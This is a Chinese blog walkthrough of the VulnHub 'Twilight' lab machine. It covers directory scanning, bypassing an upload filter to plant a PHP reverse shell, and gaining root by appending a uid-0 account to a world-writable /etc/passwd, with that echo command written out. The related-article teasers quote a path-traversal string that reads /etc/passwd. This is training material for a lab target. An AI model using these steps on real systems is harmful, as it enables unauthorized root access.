TWILIGHT靶场详解

最新推荐文章于 2024-09-21 16:02:20 发布
最新推荐文章于 2024-09-21 16:02:20 发布
阅读量157 收藏
点赞数
分类专栏: 打靶机系列 文章标签: linux 网络安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44681307/article/details/132029326
版权
文章详细介绍了如何在TWILIGHT靶场中进行端口扫描,发现文件上传漏洞,通过上传伪装成图片的PHP文件获取webshell。接着,通过扫描目录,使用gobuster工具,找到并执行上传的PHP文件,从而获得系统权限。进一步,利用可写权限的passwd文件创建新root用户,通过openssl加密密码,最终成功提升至root权限。
摘要由CSDN通过智能技术生成

TWILIGHT靶场详解

下载地址:https://download.vulnhub.com/sunset/twilight.7z

这是一个比较简单的靶场,拿到IP后我们扫描发现开启了超级多的端口

其实这些端口一点用都没有,在我的方法中

但是也有不同的方法可以拿权限,就需要这些开放的服务了

image-20230731185350272

扫描目录时候我们发现有一个文件上传的目录,只能上传图片。

dirsearch -u http://192.168.102.199/gallery/

image-20230731185404809

但是我们抓包的时候可以上传PHP文件,然后修改成图片类型。

image-20230731185637352

这样就能上传一个反弹shell

image-20230731185613220

然后我有扫描了一下上传后文件所在的目录,这里用了一个大字典扫描,小字典扫描不到。

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x txt -u http://192.168.102.199/gallery/

image-20230731190908704

点击我们上传的php文件,下面那个也是我上传的。

image-20230731190934157

这样我们kali就拿到了一个webshell

image-20230731190946469

利用python3美化一下命令行,同时也提高了权限。

python3 -c "import pty;pty.spawn('/bin/bash')"

查看passwd文件的时候发现这个文件是所有人可读可写的。

我们就可以利用这个漏洞,插入一个新用户。

image-20230731191337612

利用下面命令我们就可以插入一个新的有root权限的用户,密码需要加密,我们用openssl工具可以加密对应的账号密码。

echo 'tang:$1$tang$pBxlp5xZvZzeAXxc4Ki/v0:0:0:root:/root:/bin/bash' >> /etc/passwd

image-20230731191604691

su tang登陆新用户发现就是root权限了。

image-20230731191701773

dumplings。
关注
专栏目录
Twilight的卡牌游戏
WINGREZ‘S BLOG
05-24 692
Twilight的卡牌游戏 来源:http://acm.xidian.edu.cn/ 题目 Twilight最近在玩某种无聊的卡牌游戏,游戏的规则是这样的: 初始有n张牌,编号为1-n,依次放在位置1-n上。玩家从第一个回合开始对卡牌进行抽取, 如果当前是奇数回合,抽出所有在2的倍数的位置上的卡牌,剩下的卡牌向小编号方向靠拢; 如果当前是偶数回合,抽出所有在3...
Vulnhub sunset系列--nightfall
sinat_36853972的博客
07-08 382
nightfall 0x00 信息收集 arp-scan发现主机 靶机的ip为192.168.106.134 nmap扫描 80端口是一个apache的页面 使用enum4linux,收集到smb信息 将得到的两个用户放在User.txt中 使用hydra爆破得到ftp的用户密码为matt/cheese 使用这个账号密码登录ftp 可以猜到这是在/home/matt目录下 0x01 上传ssh公钥 通过SSH 使用密钥登录并禁止口令登录实践 这篇文章,猜测可以上传一个公钥到靶机上,实现ssh免
Twilight Nvim 使用教程
gitblog_00773的博客
08-16 283
Twilight Nvim 使用教程 twilight.nvim???? Twilight is a Lua plugin for Neovim 0.5 that dims inactive portions of the code you're editing using TreeSitter.项目地址:https://gitcode.com/gh_mirrors/tw/twilight.nvim...
vulnhub靶场之sunset: sunrise
qq_34613171的博客
02-09 448
说明:玩得开心! 难度:初学者 联系人:@ whitecr0wz http://192.168.0.108/ 目录扫描,无结果。 端口扫描,开了3306 8080 有个目录浏览,就一个文件。 这里需要主要 generated by weborf/0.12.2 这东西网上一搜 目录遍历的洞 /…%2f…%2f…%2f…%2f…%2f…%2f…%2fetc%2fpasswd 读取/etc/...
Twilight 开源项目教程
gitblog_00706的博客
08-27 383
Twilight 开源项目教程 twilightPowerful, flexible, and scalable ecosystem of Rust libraries for the Discord API.项目地址:https://gitcode.com/gh_mirrors/twi/twilight 项目介绍 Twilight 是一个用于构建可扩展和模块化的 Discord 机器人和应用的...
Twilight NVIM 配置与使用指南
gitblog_01147的博客
08-16 453
Twilight NVIM 配置与使用指南 twilight.nvim???? Twilight is a Lua plugin for Neovim 0.5 that dims inactive portions of the code you're editing using TreeSitter.项目地址:https://gitcode.com/gh_mirrors/tw/twilight.n...
Camera使用详解
ICodeMan的博客
10-27 2773
介绍 本文档是对于 android.hardware.Camera 的一个使用说明文档,主要帮助自己加强对于Camera的理解和使用,同时也是对Camera上层代码的源码进行一个翻译,说明各个方法的作用以及一些参数的实际效果,为以后能快速使用Camera进行开发提供一份详细的参考文档。 本文档适用于初、中级的Camera方向的研发人员。可以作为快速入门的文档,引导和帮助大家更好的了解源码,同时也可...
Twilight 开源项目使用教程
gitblog_00610的博客
08-28 349
Twilight 开源项目使用教程 Twilight模块化主工程项目地址:https://gitcode.com/gh_mirrors/tw/Twilight 1. 项目的目录结构及介绍 Twilight/ ├── src/ │ ├── main/ │ │ ├── java/ │ │ │ ├── com/ │ │ │ │ ├── example/ │ ...
vulhub-Sunset:Twilight
2201_75378806的博客
05-09 160
指定了盐为 "a",最后的 "a" 是要加密的原始密码。先将原始原件下载到本地,方便有问题可以恢复。它还说我们对/passwd有写入权限。表示使用 MD5 加密算法,上传linpease。解密一下shadow。
twilight软件
03-06
twilight软件 音频编辑 可以方便的编辑MP3等常见格式音频
twilight切割音频教程
03-06
【标题】:“twilight切割音频教程” 在音乐编辑和制作领域,精确地切割音频是至关重要的,这使得我们可以提取特定的音频片段、去除不需要的部分或创建混音。本教程将聚焦于名为“twilight”的软件,它是一款专门...
Twilight:Visual Studio Code的标准可爱深色主题。 :fire::fire::fire:
03-31
暮 程序员喜欢的深色主题。 这是其他主题的修改版本。 安装 转到扩展搜索栏 寻找暮光之城 安装它 安装后重新加载VSCode。 单击左下角的“设置”图标,然后选择颜色主题,然后搜索“暮光主题”并开始使用它。
Twilight Express
10-28
"Twilight Express",这款独特的字体设计,如同其名字一般,带有一种神秘而梦幻的气息,仿佛引领我们进入了一个迷人的暮色之旅。 “Twilight Express”这个名字本身就充满了诗意,让人联想到夜晚的列车在星光下疾驰...
[Linux] Linux操作系统 进程的状态
最新发布
水墨不写bug
09-21 577
[Linux] Linux操作系统 进程的状态,理解进程的不同状态的含义
Linux】uImage头部信息详细解析
W__winter的博客
09-16 1563
【代码】【Linux】uImage头部信息详细解析。
linux-网络相关概念
zdd56789的博客
09-17 648
linux-网络相关概念
linux-进程管理-进程查看与控制
Flying_Fish_roe的博客
09-18 591
进程是操作系统中执行中的程序。Linux 将每个运行的程序看作是一个进程,每个进程都有唯一的进程ID (PID)。在 Linux 系统中,进程管理是非常重要的,它能够帮助系统管理员和用户查看、管理、优化系统资源的使用情况。Linux 提供了丰富的命令来查看和控制进程,例如pstophtopkill等等。这些命令允许用户监控和控制系统中运行的进程,以确保系统资源的合理使用,并避免进程阻塞或占用过多资源。在 Linux 系统中,进程管理是非常关键的操作。通过使用pstophtop。
cv2.COLORMAP_TWILIGHT
04-10
cv2.COLORMAP_TWILIGHT是OpenCV中的一种颜色映射。根据引用,COLORMAP_TWILIGHT_SHIFTED是COLORMAP_TWILIGHT的一个变体,它是一种从蓝色到红色的渐变色映射。这种颜色映射可以用于将灰度图像转换为彩色图像,以增强图像的可视化效果。 以下是使用cv2.COLORMAP_TWILIGHT_SHIFTED的示例代码[^1]: ```python import cv2 import numpy as np # 生成一个灰度图像 gray_image = np.ones((100, 100), dtype=np.uint8) * 128 # 将灰度图像转换为彩色图像 color_image = cv2.applyColorMap(gray_image, cv2.COLORMAP_TWILIGHT_SHIFTED) # 显示彩色图像 cv2.imshow("Color Image", color_image) cv2.waitKey(0) cv2.destroyAllWindows() ``` 运行上述代码后,将显示一个从蓝色到红色的渐变色图像。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值